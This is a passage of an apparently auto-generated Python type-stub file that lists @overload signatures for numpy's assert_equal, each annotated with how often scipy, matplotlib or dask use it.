def assert_equal(
    actual: Tuple[
        int,
        int,
        int,
        Literal["coordinate"],
        Literal["unsigned-integer"],
        Literal["symmetric"],
    ],
    desired: Tuple[
        int,
        int,
        int,
        Literal["coordinate"],
        Literal["unsigned-integer"],
        Literal["symmetric"],
    ],
):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(
    actual: Tuple[
        int,
        int,
        int,
        Literal["coordinate"],
        Literal["integer"],
        Literal["skew-symmetric"],
    ],
    desired: Tuple[
        int,
        int,
        int,
        Literal["coordinate"],
        Literal["integer"],
        Literal["skew-symmetric"],
    ],
):
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_equal(
    actual: Tuple[
        int, int, int, Literal["coordinate"], Literal["real"], Literal["skew-symmetric"]
    ],
    desired: Tuple[
        int, int, int, Literal["coordinate"], Literal["real"], Literal["skew-symmetric"]
    ],
):
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_equal(
    actual: Tuple[
        int, int, int, Literal["coordinate"], Literal["complex"], Literal["hermitian"]
    ],
    desired: Tuple[
        int, int, int, Literal["coordinate"], Literal["complex"], Literal["hermitian"]
    ],
):
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_equal(
    actual: Tuple[
        int, int, int, Literal["coordinate"], Literal["real"], Literal["symmetric"]
    ],
    desired: Tuple[
        int, int, int, Literal["coordinate"], Literal["real"], Literal["symmetric"]
    ],
):
    """
    usage.scipy: 3
    """
    ...
@overload
def assert_equal(
    actual: Tuple[
        int, int, int, Literal["coordinate"], Literal["pattern"], Literal["general"]
    ],
    desired: Tuple[
        int, int, int, Literal["coordinate"], Literal["pattern"], Literal["general"]
    ],
):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(actual: numpy.ndarray, desired: numpy.matrix):
    """
    usage.scipy: 5
    """
    ...
@overload
def assert_equal(
    actual: Tuple[
        int, int, int, Literal["coordinate"], Literal["pattern"], Literal["symmetric"]
    ],
    desired: Tuple[
        int, int, int, Literal["coordinate"], Literal["pattern"], Literal["symmetric"]
    ],
):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(actual: Literal["data"], desired: Literal["data"]):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(actual: numpy.ndarray, desired: List[bool]):
    """
    usage.matplotlib: 2
    usage.scipy: 5
    """
    ...
@overload
def assert_equal(actual: numpy.ma.core.MaskedArray, desired: List[int]):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(actual: numpy.ndarray, desired: List[List[bool]]):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(
    actual: scipy.linalg._testutils._FakeMatrix, desired: numpy.ndarray, err_msg: str
):
    """
    usage.scipy: 4
    """
    ...
@overload
def assert_equal(
    actual: scipy.linalg._testutils._FakeMatrix2, desired: numpy.ndarray, err_msg: str
):
    """
    usage.scipy: 4
    """
    ...
@overload
def assert_equal(actual: Literal["z"], desired: Literal["z"]):
    """
    usage.scipy: 4
    """
    ...
@overload
def assert_equal(actual: Literal["d"], desired: Literal["d"]):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(actual: Literal["c"], desired: Literal["c"]):
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_equal(actual: bool, desired: bool, err_msg: Literal["[[0, 1], [2, 3]]"]):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(actual: float, desired: numpy.float32):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(actual: float, desired: numpy.float64):
    """
    usage.matplotlib: 1
    usage.scipy: 4
    """
    ...
@overload
def assert_equal(actual: numpy.int32, desired: numpy.int64):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(actual: int, desired: int, err_msg: str):
    """
    usage.scipy: 7
    """
    ...
@overload
def assert_equal(actual: numpy.float32, desired: int, err_msg: str):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(actual: numpy.float64, desired: int, err_msg: str):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(
    actual: Type[scipy.sparse.csc.csc_matrix],
    desired: Type[scipy.sparse.csc.csc_matrix],
):
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_equal(actual: numpy.dtype, desired: Type[float]):
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_equal(actual: int, desired: int, err_msg: Literal["n = 34"]):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(actual: int, desired: int, err_msg: Literal["n = 35"]):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(
    actual: Literal["Something else."], desired: Literal["Something else."]
):
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_equal(actual: List[numpy.int32], desired: List[numpy.int32]):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(actual: List[numpy.int64], desired: List[numpy.int64]):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(actual: Literal["i"], desired: Literal["i"]):
    """
    usage.scipy: 2
    """
    ...
# NOTE(review): `slice[int, int, int]` is not subscriptable at runtime on
# Python < 3.12; assumed this file is only consumed as a lazily-evaluated
# stub/annotation source — TODO confirm against the consuming tooling.
@overload
def assert_equal(
    actual: List[Tuple[slice[int, int, int]]],
    desired: List[Tuple[slice[int, int, int]]],
):
    """
    usage.scipy: 3
    """
    ...
@overload
def assert_equal(
    actual: List[Tuple[slice[int, int, int], slice[int, int, int]]],
    desired: List[Tuple[slice[int, int, int], slice[int, int, int]]],
):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(
    actual: List[Union[Tuple[slice[int, int, int], slice[int, int, int]], None]],
    desired: List[Union[Tuple[slice[int, int, int], slice[int, int, int]], None]],
):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(actual: numpy.int64, desired: float):
    """
    usage.scipy: 7
    """
    ...
@overload
def assert_equal(actual: numpy.uint64, desired: float):
    """
    usage.scipy: 5
    """
    ...
@overload
def assert_equal(
    actual: Tuple[
        numpy.int8,
        numpy.int8,
        Tuple[numpy.int64, numpy.int64],
        Tuple[numpy.int64, numpy.int64],
    ],
    desired: Tuple[
        numpy.int8,
        numpy.int8,
        Tuple[numpy.int64, numpy.int64],
        Tuple[numpy.int64, numpy.int64],
    ],
):
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_equal(
    actual: Tuple[
        numpy.uint8,
        numpy.uint8,
        Tuple[numpy.int64, numpy.int64],
        Tuple[numpy.int64, numpy.int64],
    ],
    desired: Tuple[
        numpy.uint8,
        numpy.uint8,
        Tuple[numpy.int64, numpy.int64],
        Tuple[numpy.int64, numpy.int64],
    ],
):
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_equal(
    actual: Tuple[
        numpy.int16,
        numpy.int16,
        Tuple[numpy.int64, numpy.int64],
        Tuple[numpy.int64, numpy.int64],
    ],
    desired: Tuple[
        numpy.int16,
        numpy.int16,
        Tuple[numpy.int64, numpy.int64],
        Tuple[numpy.int64, numpy.int64],
    ],
):
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_equal(
    actual: Tuple[
        numpy.uint16,
        numpy.uint16,
        Tuple[numpy.int64, numpy.int64],
        Tuple[numpy.int64, numpy.int64],
    ],
    desired: Tuple[
        numpy.uint16,
        numpy.uint16,
        Tuple[numpy.int64, numpy.int64],
        Tuple[numpy.int64, numpy.int64],
    ],
):
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_equal(
    actual: Tuple[
        numpy.int32,
        numpy.int32,
        Tuple[numpy.int64, numpy.int64],
        Tuple[numpy.int64, numpy.int64],
    ],
    desired: Tuple[
        numpy.int32,
        numpy.int32,
        Tuple[numpy.int64, numpy.int64],
        Tuple[numpy.int64, numpy.int64],
    ],
):
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_equal(
    actual: Tuple[
        numpy.uint32,
        numpy.uint32,
        Tuple[numpy.int64, numpy.int64],
        Tuple[numpy.int64, numpy.int64],
    ],
    desired: Tuple[
        numpy.uint32,
        numpy.uint32,
        Tuple[numpy.int64, numpy.int64],
        Tuple[numpy.int64, numpy.int64],
    ],
):
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_equal(
    actual: Tuple[
        numpy.int64,
        numpy.int64,
        Tuple[numpy.int64, numpy.int64],
        Tuple[numpy.int64, numpy.int64],
    ],
    desired: Tuple[
        numpy.int64,
        numpy.int64,
        Tuple[numpy.int64, numpy.int64],
        Tuple[numpy.int64, numpy.int64],
    ],
):
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_equal(
    actual: Tuple[
        numpy.uint64,
        numpy.uint64,
        Tuple[numpy.int64, numpy.int64],
        Tuple[numpy.int64, numpy.int64],
    ],
    desired: Tuple[
        numpy.uint64,
        numpy.uint64,
        Tuple[numpy.int64, numpy.int64],
        Tuple[numpy.int64, numpy.int64],
    ],
):
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_equal(
    actual: Tuple[
        numpy.float32,
        numpy.float32,
        Tuple[numpy.int64, numpy.int64],
        Tuple[numpy.int64, numpy.int64],
    ],
    desired: Tuple[
        numpy.float32,
        numpy.float32,
        Tuple[numpy.int64, numpy.int64],
        Tuple[numpy.int64, numpy.int64],
    ],
):
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_equal(
    actual: Tuple[
        numpy.float64,
        numpy.float64,
        Tuple[numpy.int64, numpy.int64],
        Tuple[numpy.int64, numpy.int64],
    ],
    desired: Tuple[
        numpy.float64,
        numpy.float64,
        Tuple[numpy.int64, numpy.int64],
        Tuple[numpy.int64, numpy.int64],
    ],
):
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_equal(actual: Type[numpy.int8], desired: Type[numpy.int8]):
    """
    usage.scipy: 5
    """
    ...
@overload
def assert_equal(actual: Literal["best1exp"], desired: Literal["best1exp"]):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(actual: Literal["_best1"], desired: Literal["_best1"]):
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_equal(actual: Literal["best1bin"], desired: Literal["best1bin"]):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(actual: Literal["rand1bin"], desired: Literal["rand1bin"]):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(actual: Literal["_rand1"], desired: Literal["_rand1"]):
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_equal(actual: Literal["rand1exp"], desired: Literal["rand1exp"]):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(actual: Literal["rand2exp"], desired: Literal["rand2exp"]):
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_equal(actual: Literal["_rand2"], desired: Literal["_rand2"]):
    """
    usage.scipy: 3
    """
    ...
@overload
def assert_equal(actual: Literal["best2bin"], desired: Literal["best2bin"]):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(actual: Literal["_best2"], desired: Literal["_best2"]):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(actual: Literal["rand2bin"], desired: Literal["rand2bin"]):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(actual: Literal["randtobest1bin"], desired: Literal["randtobest1bin"]):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(actual: Literal["_randtobest1"], desired: Literal["_randtobest1"]):
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_equal(actual: Literal["randtobest1exp"], desired: Literal["randtobest1exp"]):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(
    actual: Literal["currenttobest1bin"], desired: Literal["currenttobest1bin"]
):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(
    actual: Literal["_currenttobest1"], desired: Literal["_currenttobest1"]
):
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_equal(
    actual: Literal["currenttobest1exp"], desired: Literal["currenttobest1exp"]
):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(actual: List[Union[int, float]], desired: List[Union[int, float]]):
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_equal(actual: float, desired: numpy.ndarray):
    """
    usage.scipy: 3
    """
    ...
@overload
def assert_equal(actual: numpy.ndarray, desired: bool):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(actual: numpy.ndarray, desired: List[Tuple[int, float]]):
    """
    usage.scipy: 7
    """
    ...
@overload
def assert_equal(actual: numpy.ndarray, desired: List[Tuple[int, int]]):
    """
    usage.scipy: 6
    """
    ...
@overload
def assert_equal(actual: numpy.ndarray, desired: List[Tuple[float, int]]):
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_equal(actual: numpy.ndarray, desired: List[Tuple[float, float]]):
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_equal(actual: int, desired: numpy.int64):
    """
    usage.scipy: 6
    """
    ...
@overload
def assert_equal(actual: bool, desired: int):
    """
    usage.scipy: 3
    """
    ...
@overload
def assert_equal(actual: numpy.ndarray, desired: numpy.float64):
    """
    usage.scipy: 5
    """
    ...
@overload
def assert_equal(actual: numpy.float64, desired: numpy.ndarray):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(actual: numpy.ndarray, desired: List[Union[float, int]]):
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_equal(actual: List[Union[list, int]], desired: List[Union[list, int]]):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(actual: List[Union[int, list]], desired: List[Union[int, list]]):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(
    actual: Tuple[numpy.ndarray, numpy.ndarray], desired: Tuple[list, list]
):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(
    actual: Tuple[numpy.ndarray, numpy.ndarray], desired: Tuple[list, List[int]]
):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(actual: Tuple[int, float], desired: Tuple[int, float]):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(
    actual: Tuple[numpy.ndarray, numpy.ndarray, numpy.ndarray],
    desired: List[Union[int, float]],
):
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_equal(
    actual: Tuple[numpy.ndarray, numpy.ndarray, numpy.ndarray, numpy.ndarray],
    desired: List[Union[float, int]],
):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(actual: Literal["direct"], desired: Literal["direct"]):
    """
    usage.scipy: 6
    """
    ...
@overload
def assert_equal(actual: numpy.ndarray, desired: List[decimal.Decimal]):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(actual: numpy.dtype, desired: Type[numpy.int8]):
    """
    usage.scipy: 16
    """
    ...
@overload
def assert_equal(actual: numpy.dtype, desired: Type[numpy.uint16]):
    """
    usage.scipy: 10
    """
    ...
@overload
def assert_equal(actual: numpy.dtype, desired: Type[numpy.int16]):
    """
    usage.scipy: 11
    """
    ...
@overload
def assert_equal(actual: numpy.dtype, desired: Type[numpy.uint64]):
    """
    usage.scipy: 10
    """
    ...
@overload
def assert_equal(actual: numpy.dtype, desired: Type[int]):
    """
    usage.scipy: 11
    """
    ...
@overload
def assert_equal(actual: numpy.dtype, desired: Type[numpy.ulonglong]):
    """
    usage.scipy: 10
    """
    ...
@overload
def assert_equal(actual: numpy.dtype, desired: Type[decimal.Decimal]):
    """
    usage.scipy: 8
    """
    ...
@overload
def assert_equal(actual: numpy.ndarray, desired: List[complex]):
    """
    usage.scipy: 5
    """
    ...
@overload
def assert_equal(actual: numpy.ndarray, desired: numpy.complex128):
    """
    usage.scipy: 3
    """
    ...
@overload
def assert_equal(actual: numpy.ndarray, desired: complex):
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_equal(actual: Tuple[int, int], desired: List[int]):
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_equal(actual: numpy.ndarray, desired: numpy.ndarray, err_msg: int):
    """
    usage.scipy: 4
    """
    ...
@overload
def assert_equal(actual: bool, desired: numpy.bool_, err_msg: Literal["boxcar, 10, 0"]):
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_equal(actual: bool, desired: numpy.bool_, err_msg: Literal["boxcar, 10, 9"]):
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_equal(
    actual: bool, desired: numpy.bool_, err_msg: Literal["bartlett, 51, 26"]
):
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_equal(
    actual: bool, desired: numpy.bool_, err_msg: Literal["hann, 256, 128"]
):
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_equal(
    actual: bool, desired: numpy.bool_, err_msg: Literal["hann, 256, 192"]
):
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_equal(
    actual: bool, desired: numpy.bool_, err_msg: Literal["blackman, 300, 200"]
):
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_equal(actual: bool, desired: numpy.bool_, err_msg: str):
    """
    usage.scipy: 3
    """
    ...
@overload
def assert_equal(
    actual: bool, desired: numpy.bool_, err_msg: Literal["hann, 256, 255"]
):
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_equal(actual: bool, desired: numpy.bool_, err_msg: Literal["boxcar, 10, 7"]):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(
    actual: bool, desired: numpy.bool_, err_msg: Literal["bartlett, 51, 10"]
):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(actual: bool, desired: numpy.bool_, err_msg: Literal["hann, 256, 37"]):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(
    actual: bool, desired: numpy.bool_, err_msg: Literal["blackman, 300, 123"]
):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(actual: bool, desired: numpy.bool_, err_msg: Literal["hann, 256, 39"]):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(actual: bool, desired: numpy.bool_, err_msg: Literal["hann, 64, 0"]):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(actual: numpy.float64, desired: numpy.float64, err_msg: str):
    """
    usage.scipy: 4
    """
    ...
@overload
def assert_equal(actual: numpy.int64, desired: int, err_msg: Literal["[1.]"]):
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_equal(actual: numpy.int64, desired: int, err_msg: str):
    """
    usage.scipy: 3
    """
    ...
@overload
def assert_equal(actual: numpy.matrix, desired: List[List[int]]):
    """
    usage.scipy: 12
    """
    ...
@overload
def assert_equal(actual: Callable, desired: Callable):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(actual: numpy.matrix, desired: numpy.ndarray):
    """
    usage.scipy: 20
    """
    ...
@overload
def assert_equal(actual: Literal["csr"], desired: Literal["csr"]):
    """
    usage.scipy: 14
    """
    ...
@overload
def assert_equal(
    actual: Literal["matrix on the left"], desired: Literal["matrix on the left"]
):
    """
    usage.scipy: 8
    """
    ...
@overload
def assert_equal(
    actual: Literal["matrix on the right"], desired: Literal["matrix on the right"]
):
    """
    usage.scipy: 8
    """
    ...
@overload
def assert_equal(actual: Literal["bsr"], desired: Literal["bsr"]):
    """
    usage.scipy: 12
    """
    ...
@overload
def assert_equal(actual: Literal["coo"], desired: Literal["coo"]):
    """
    usage.scipy: 13
    """
    ...
@overload
def assert_equal(actual: Literal["csc"], desired: Literal["csc"]):
    """
    usage.scipy: 14
    """
    ...
@overload
def assert_equal(actual: Literal["dia"], desired: Literal["dia"]):
    """
    usage.scipy: 14
    """
    ...
@overload
def assert_equal(actual: Literal["dok"], desired: Literal["dok"]):
    """
    usage.scipy: 12
    """
    ...
@overload
def assert_equal(actual: Literal["lil"], desired: Literal["lil"]):
    """
    usage.scipy: 13
    """
    ...
@overload
def assert_equal(actual: numpy.bool_, desired: numpy.bool_):
    """
    usage.dask: 1
    usage.scipy: 2
    """
    ...
@overload
def assert_equal(actual: Type[numpy.bool_], desired: numpy.dtype):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(actual: numpy.int8, desired: numpy.int8):
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_equal(actual: Type[numpy.int8], desired: numpy.dtype):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(actual: Type[numpy.uint8], desired: numpy.dtype):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(actual: Type[numpy.int16], desired: numpy.dtype):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(actual: Type[numpy.uint16], desired: numpy.dtype):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(actual: Type[numpy.int32], desired: numpy.dtype):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(actual: Type[numpy.uint32], desired: numpy.dtype):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(actual: Type[numpy.int64], desired: numpy.dtype):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(actual: Type[numpy.uint64], desired: numpy.dtype):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(actual: numpy.int64, desired: numpy.longlong):
    """
    usage.scipy: 5
    """
    ...
@overload
def assert_equal(actual: numpy.uint64, desired: numpy.ulonglong):
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_equal(actual: Type[numpy.float32], desired: numpy.dtype):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(actual: Type[numpy.float64], desired: numpy.dtype):
    """
    usage.scipy: 1
    """
    ...
# NOTE(review): numpy.float128 / numpy.complex256 exist only on platforms
# whose C long double is extended-precision — the stubs below are
# platform-dependent recorded usages.
@overload
def assert_equal(actual: numpy.float128, desired: numpy.float128):
    """
    usage.scipy: 5
    """
    ...
@overload
def assert_equal(actual: Type[numpy.float128], desired: numpy.dtype):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(actual: Type[numpy.complex64], desired: numpy.dtype):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(actual: Type[numpy.complex128], desired: numpy.dtype):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(actual: numpy.complex256, desired: numpy.complex256):
    """
    usage.scipy: 5
    """
    ...
@overload
def assert_equal(actual: Type[numpy.complex256], desired: numpy.dtype):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(actual: numpy.bool_, desired: int):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(actual: numpy.complex128, desired: int):
    """
    usage.scipy: 7
    """
    ...
@overload
def assert_equal(actual: numpy.dtype, desired: Type[numpy.int32]):
    """
    usage.scipy: 22
    """
    ...
@overload
def assert_equal(actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(0, 0)"]):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(0, 1)"]):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(
    actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(0, -1)"]
):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(
    actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(0, -2)"]
):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(
    actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(0, -5)"]
):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(
    actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(0, array(-1))"]
):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(
    actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(0, -3)"]
):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(1, 0)"]):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(1, 1)"]):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(
    actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(1, -1)"]
):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(
    actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(1, -2)"]
):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(
    actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(1, -5)"]
):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(
    actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(1, array(-1))"]
):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(
    actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(1, -3)"]
):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(
    actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(-1, 0)"]
):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(
    actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(-1, 1)"]
):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(
    actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(-1, -1)"]
):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(
    actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(-1, -2)"]
):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(
    actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(-1, -5)"]
):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(
    actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(-1, array(-1))"]
):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(
    actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(-1, -3)"]
):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(
    actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(-2, 0)"]
):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(
    actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(-2, 1)"]
):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(
    actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(-2, -1)"]
):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(
    actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(-2, -2)"]
):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(
    actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(-2, -5)"]
):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(
    actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(-2, array(-1))"]
):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(
    actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(-2, -3)"]
):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(
    actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(-5, 0)"]
):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(
    actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(-5, 1)"]
):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(
    actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(-5, -1)"]
):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(
    actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(-5, -2)"]
):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(
    actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(-5, -5)"]
):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(
    actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(-5, array(-1))"]
):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(
    actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(-5, -3)"]
):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(
    actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(array(-1), 0)"]
):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(
    actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(array(-1), 1)"]
):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(
    actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(array(-1), -1)"]
):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(
    actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(array(-1), -2)"]
):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(
    actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(array(-1), -5)"]
):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(actual: numpy.int64, desired: numpy.int64, err_msg: str):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(
    actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(array(-1), -3)"]
):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(
    actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(-3, 0)"]
):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(
    actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(-3, 1)"]
):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(
    actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(-3, -1)"]
):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(
    actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(-3, -2)"]
):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(
    actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(-3, -5)"]
):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(
    actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(-3, array(-1))"]
):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(
    actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(-3, -3)"]
):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(actual: scipy.sparse.csr.csr_matrix, desired: numpy.ndarray):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(actual: numpy.uint64, desired: numpy.int64):
    """
    usage.scipy: 3
    """
    ...
@overload
